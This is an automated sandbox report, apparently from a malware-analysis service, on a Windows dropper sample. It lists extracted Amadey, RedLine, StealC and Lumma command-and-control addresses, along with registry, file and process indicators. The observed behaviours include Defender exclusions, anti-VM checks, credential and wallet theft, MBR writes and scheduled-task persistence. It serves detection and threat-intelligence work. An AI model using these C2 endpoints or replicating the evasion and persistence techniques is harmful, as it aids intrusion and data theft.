Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
30-05-2024 05:05
Static task
static1
Behavioral task
behavioral1
Sample
6431cb4e068443e83cd4d36b1c0718c2958ee43007e16661c347e314c4d87c73.exe
Resource
win10v2004-20240508-en
Behavioral task
behavioral2
Sample
6431cb4e068443e83cd4d36b1c0718c2958ee43007e16661c347e314c4d87c73.exe
Resource
win11-20240508-en
General
-
Target
6431cb4e068443e83cd4d36b1c0718c2958ee43007e16661c347e314c4d87c73.exe
-
Size
1.8MB
-
MD5
e92c63ce517395254575c4bc03c28ef6
-
SHA1
22270eba625c036ac12599b52d4dd77cdf71ecd7
-
SHA256
6431cb4e068443e83cd4d36b1c0718c2958ee43007e16661c347e314c4d87c73
-
SHA512
31c61d1b7979de22a5b7f4df96b1d1bd7f947dd2254fa5a41b9fdaa22455752bf4fca9c1acec2b0cbfb4942a626d382b4038469eb28af9de3872c6d2cf68549f
-
SSDEEP
49152:AtVXcyC2xa5IPTLgCdxA+PG6+Doo8wjZM/O/m:EXnriIbLgCdxjtoPl
Malware Config
Extracted
amadey
4.21
49e482
http://147.45.47.70
-
install_dir
1b29d73536
-
install_file
axplont.exe
-
strings_key
4d31dd1a190d9879c21fac6d87dc0043
-
url_paths
/tr8nomy/index.php
Extracted
redline
@LOGSCLOUDYT_BOT
185.172.128.33:8970
Extracted
redline
1
185.215.113.67:40960
Extracted
stealc
zzvv
http://23.88.106.134
-
url_path
/c73eed764cc59dcb.php
Extracted
lumma
https://roomabolishsnifftwk.shop/api
https://museumtespaceorsp.shop/api
https://buttockdecarderwiso.shop/api
https://detailbaconroollyws.shop/api
https://averageaattractiionsl.shop/api
https://horsedwollfedrwos.shop/api
https://femininiespywageg.shop/api
https://patternapplauderw.shop/api
https://employhabragaomlsp.shop/api
https://understanndtytonyguw.shop/api
https://stalfbaclcalorieeis.shop/api
https://considerrycurrentyws.shop/api
https://civilianurinedtsraov.shop/api
https://messtimetabledkolvk.shop/api
https://deprivedrinkyfaiir.shop/api
https://relaxtionflouwerwi.shop/api
Signatures
-
Modifies firewall policy service 2 TTPs 1 IoCs
Processes:
OFc2WnlpNqXfMh1hYCXLEe7X.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" OFc2WnlpNqXfMh1hYCXLEe7X.exe -
PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 4 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe family_redline behavioral1/memory/4300-62-0x0000000000480000-0x00000000004D2000-memory.dmp family_redline C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe family_redline behavioral1/memory/1540-114-0x0000000000480000-0x00000000004D2000-memory.dmp family_redline -
Processes:
file300un.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" file300un.exe -
Processes:
file300un.exeOFc2WnlpNqXfMh1hYCXLEe7X.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe = "0" file300un.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ = "1" OFc2WnlpNqXfMh1hYCXLEe7X.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths file300un.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 6 IoCs
Processes:
6431cb4e068443e83cd4d36b1c0718c2958ee43007e16661c347e314c4d87c73.exeaxplont.exeaxplont.exeOFc2WnlpNqXfMh1hYCXLEe7X.exeaxplont.exeaxplont.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 6431cb4e068443e83cd4d36b1c0718c2958ee43007e16661c347e314c4d87c73.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplont.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplont.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ OFc2WnlpNqXfMh1hYCXLEe7X.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplont.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplont.exe -
Blocklisted process makes network request 1 IoCs
Processes:
rundll32.exeflow pid process 211 1724 rundll32.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell and hide display window.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.EXEpowershell.exepid process 2072 powershell.exe 1656 powershell.exe 1520 powershell.exe 1700 powershell.exe 5052 powershell.exe 456 powershell.EXE 1792 powershell.exe -
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 14 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
axplont.exerundll32.exe6431cb4e068443e83cd4d36b1c0718c2958ee43007e16661c347e314c4d87c73.exeOFc2WnlpNqXfMh1hYCXLEe7X.exeInstall.exeaxplont.exeaxplont.exeaxplont.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplont.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 6431cb4e068443e83cd4d36b1c0718c2958ee43007e16661c347e314c4d87c73.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion OFc2WnlpNqXfMh1hYCXLEe7X.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplont.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion OFc2WnlpNqXfMh1hYCXLEe7X.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplont.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplont.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplont.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplont.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 6431cb4e068443e83cd4d36b1c0718c2958ee43007e16661c347e314c4d87c73.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplont.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplont.exe -
Checks computer location settings 2 TTPs 8 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
RegAsm.exeNewoff.exefile300un.exeInstall.exeUlrnSVu.exe6431cb4e068443e83cd4d36b1c0718c2958ee43007e16661c347e314c4d87c73.exeaxplont.exeRegAsm.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\Control Panel\International\Geo\Nation RegAsm.exe Key value queried \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\Control Panel\International\Geo\Nation Newoff.exe Key value queried \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\Control Panel\International\Geo\Nation file300un.exe Key value queried \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\Control Panel\International\Geo\Nation Install.exe Key value queried \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\Control Panel\International\Geo\Nation UlrnSVu.exe Key value queried \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\Control Panel\International\Geo\Nation 6431cb4e068443e83cd4d36b1c0718c2958ee43007e16661c347e314c4d87c73.exe Key value queried \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\Control Panel\International\Geo\Nation axplont.exe Key value queried \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\Control Panel\International\Geo\Nation RegAsm.exe -
Executes dropped EXE 24 IoCs
Processes:
axplont.exe33333.exesvhoost.exeOne.exeaxplont.exefileosn.exelumma1234.exegold.exeswizzzz.exefile300un.exeNewoff.exeZI4lHeOwb0r6iUPqytb0Zmzf.exeCqbMuGXXSYnmsrDGhRReY2eq.exeOFc2WnlpNqXfMh1hYCXLEe7X.exeOzCJJYF8vrJ47OtL4AJuVf5O.exeZavb7AcxYw6gQwgm1dXI4U2n.exeInstall.exeInstall.exeInstall.exeaxplont.exeNewoff.exeUlrnSVu.exeaxplont.exeNewoff.exepid process 3756 axplont.exe 856 33333.exe 4300 svhoost.exe 532 One.exe 2196 axplont.exe 1540 fileosn.exe 4128 lumma1234.exe 5112 gold.exe 1196 swizzzz.exe 4236 file300un.exe 3416 Newoff.exe 3356 ZI4lHeOwb0r6iUPqytb0Zmzf.exe 2928 CqbMuGXXSYnmsrDGhRReY2eq.exe 3892 OFc2WnlpNqXfMh1hYCXLEe7X.exe 4452 OzCJJYF8vrJ47OtL4AJuVf5O.exe 4568 Zavb7AcxYw6gQwgm1dXI4U2n.exe 3264 Install.exe 3448 Install.exe 2320 Install.exe 3940 axplont.exe 1080 Newoff.exe 4344 UlrnSVu.exe 3172 axplont.exe 4668 Newoff.exe -
Identifies Wine through registry keys 2 TTPs 5 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
Processes:
axplont.exe6431cb4e068443e83cd4d36b1c0718c2958ee43007e16661c347e314c4d87c73.exeaxplont.exeaxplont.exeaxplont.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\Software\Wine axplont.exe Key opened \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\Software\Wine 6431cb4e068443e83cd4d36b1c0718c2958ee43007e16661c347e314c4d87c73.exe Key opened \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\Software\Wine axplont.exe Key opened \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\Software\Wine axplont.exe Key opened \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\Software\Wine axplont.exe -
Loads dropped DLL 2 IoCs
Processes:
CqbMuGXXSYnmsrDGhRReY2eq.exerundll32.exepid process 2928 CqbMuGXXSYnmsrDGhRReY2eq.exe 1724 rundll32.exe -
Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule C:\Users\Admin\Pictures\OFc2WnlpNqXfMh1hYCXLEe7X.exe themida behavioral1/memory/3892-350-0x0000000140000000-0x000000014159C000-memory.dmp themida behavioral1/memory/3892-359-0x0000000140000000-0x000000014159C000-memory.dmp themida behavioral1/memory/3892-360-0x0000000140000000-0x000000014159C000-memory.dmp themida behavioral1/memory/3892-355-0x0000000140000000-0x000000014159C000-memory.dmp themida behavioral1/memory/3892-358-0x0000000140000000-0x000000014159C000-memory.dmp themida behavioral1/memory/3892-413-0x0000000140000000-0x000000014159C000-memory.dmp themida -
Processes:
file300un.exeOFc2WnlpNqXfMh1hYCXLEe7X.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths file300un.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions file300un.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe = "0" file300un.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ = "1" OFc2WnlpNqXfMh1hYCXLEe7X.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
file300un.exeOFc2WnlpNqXfMh1hYCXLEe7X.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA file300un.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" file300un.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA OFc2WnlpNqXfMh1hYCXLEe7X.exe -
Drops Chrome extension 2 IoCs
Processes:
UlrnSVu.exedescription ioc process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json UlrnSVu.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json UlrnSVu.exe -
Drops desktop.ini file(s) 1 IoCs
Processes:
Install.exedescription ioc process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini Install.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 4 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 151 api.myip.com 152 api.myip.com 155 ipinfo.io 156 ipinfo.io -
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
Processes:
CqbMuGXXSYnmsrDGhRReY2eq.exedescription ioc process File opened for modification \??\PhysicalDrive0 CqbMuGXXSYnmsrDGhRReY2eq.exe -
Drops file in System32 directory 35 IoCs
Processes:
UlrnSVu.exeInstall.exeOFc2WnlpNqXfMh1hYCXLEe7X.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 UlrnSVu.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies UlrnSVu.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E52E4DB9468EB31D663A0754C2775A04 UlrnSVu.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol UlrnSVu.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_91E41FAE8B0B67645773C1C9A8DB10E4 UlrnSVu.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE UlrnSVu.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache UlrnSVu.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content UlrnSVu.exe File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI OFc2WnlpNqXfMh1hYCXLEe7X.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA UlrnSVu.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_05B056B983E25E9B4D43BC3D9283D686 UlrnSVu.exe File opened for modification C:\Windows\System32\GroupPolicy OFc2WnlpNqXfMh1hYCXLEe7X.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 UlrnSVu.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 UlrnSVu.exe File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini OFc2WnlpNqXfMh1hYCXLEe7X.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 UlrnSVu.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E52E4DB9468EB31D663A0754C2775A04 UlrnSVu.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA UlrnSVu.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA UlrnSVu.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData UlrnSVu.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_242CEA72AD255CEF17D8B88AD3038326 UlrnSVu.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_242CEA72AD255CEF17D8B88AD3038326 UlrnSVu.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_91E41FAE8B0B67645773C1C9A8DB10E4 UlrnSVu.exe File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol OFc2WnlpNqXfMh1hYCXLEe7X.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA UlrnSVu.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_05B056B983E25E9B4D43BC3D9283D686 UlrnSVu.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft UlrnSVu.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
Processes:
6431cb4e068443e83cd4d36b1c0718c2958ee43007e16661c347e314c4d87c73.exeaxplont.exeaxplont.exeOFc2WnlpNqXfMh1hYCXLEe7X.exeaxplont.exeaxplont.exepid process 3608 6431cb4e068443e83cd4d36b1c0718c2958ee43007e16661c347e314c4d87c73.exe 3756 axplont.exe 2196 axplont.exe 3892 OFc2WnlpNqXfMh1hYCXLEe7X.exe 3892 OFc2WnlpNqXfMh1hYCXLEe7X.exe 3940 axplont.exe 3172 axplont.exe -
Suspicious use of SetThreadContext 8 IoCs
Processes:
33333.exelumma1234.exegold.exeswizzzz.exefile300un.exeZI4lHeOwb0r6iUPqytb0Zmzf.exeAddInProcess32.exedescription pid process target process PID 856 set thread context of 4080 856 33333.exe RegAsm.exe PID 4128 set thread context of 1836 4128 lumma1234.exe RegAsm.exe PID 5112 set thread context of 4604 5112 gold.exe RegAsm.exe PID 1196 set thread context of 1964 1196 swizzzz.exe RegAsm.exe PID 4236 set thread context of 4864 4236 file300un.exe AddInProcess32.exe PID 3356 set thread context of 3676 3356 ZI4lHeOwb0r6iUPqytb0Zmzf.exe AddInProcess32.exe PID 3356 set thread context of 960 3356 ZI4lHeOwb0r6iUPqytb0Zmzf.exe AddInProcess32.exe PID 3676 set thread context of 2004 3676 AddInProcess32.exe InstallUtil.exe -
Drops file in Program Files directory 14 IoCs
Processes:
UlrnSVu.exedescription ioc process File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi UlrnSVu.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak UlrnSVu.exe File created C:\Program Files (x86)\tegRANPZONsU2\RXaqAVj.xml UlrnSVu.exe File created C:\Program Files (x86)\krdeMCnRKomDOvwVunR\YcIorhS.xml UlrnSVu.exe File created C:\Program Files (x86)\YLgKyOFzWxOqC\aGBdKdv.dll UlrnSVu.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi UlrnSVu.exe File created C:\Program Files (x86)\tegRANPZONsU2\GCTPrhIJhakGf.dll UlrnSVu.exe File created C:\Program Files (x86)\nFLFFjqrQPUn\RURCtQr.dll UlrnSVu.exe File created C:\Program Files (x86)\JipyTrDkU\CPhJaG.dll UlrnSVu.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak UlrnSVu.exe File created C:\Program Files (x86)\krdeMCnRKomDOvwVunR\UhtqmmS.dll UlrnSVu.exe File created C:\Program Files (x86)\YLgKyOFzWxOqC\fgUFbrM.xml UlrnSVu.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja UlrnSVu.exe File created C:\Program Files (x86)\JipyTrDkU\dKSmcil.xml UlrnSVu.exe -
Drops file in Windows directory 5 IoCs
Processes:
6431cb4e068443e83cd4d36b1c0718c2958ee43007e16661c347e314c4d87c73.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exedescription ioc process File created C:\Windows\Tasks\axplont.job 6431cb4e068443e83cd4d36b1c0718c2958ee43007e16661c347e314c4d87c73.exe File created C:\Windows\Tasks\bqGGCwwWIommTRgeuN.job schtasks.exe File created C:\Windows\Tasks\WKALCIrwIEiqhKBsn.job schtasks.exe File created C:\Windows\Tasks\jiLwFdOzPPQiWLm.job schtasks.exe File created C:\Windows\Tasks\QdCYtDviHOrgqJLgZ.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 5 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 4396 856 WerFault.exe 33333.exe 2240 5112 WerFault.exe gold.exe 1808 2320 WerFault.exe Install.exe 3672 3448 WerFault.exe Install.exe 2644 4344 WerFault.exe UlrnSVu.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
AddInProcess32.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI AddInProcess32.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI AddInProcess32.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI AddInProcess32.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
RegAsm.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString RegAsm.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 RegAsm.exe -
Creates scheduled task(s) 1 TTPs 11 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 3292 schtasks.exe 4656 schtasks.exe 2420 schtasks.exe 4124 schtasks.exe 4736 schtasks.exe 2560 schtasks.exe 4280 schtasks.exe 4712 schtasks.exe 1520 schtasks.exe 328 schtasks.exe 3092 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 5064 timeout.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
Processes:
Install.exerundll32.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
UlrnSVu.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeInstall.exedescription ioc process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" UlrnSVu.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\SlowContextMenuEntries = 6024b221ea3a6910a2dc08002b30309d9c0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 UlrnSVu.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" UlrnSVu.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket UlrnSVu.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) 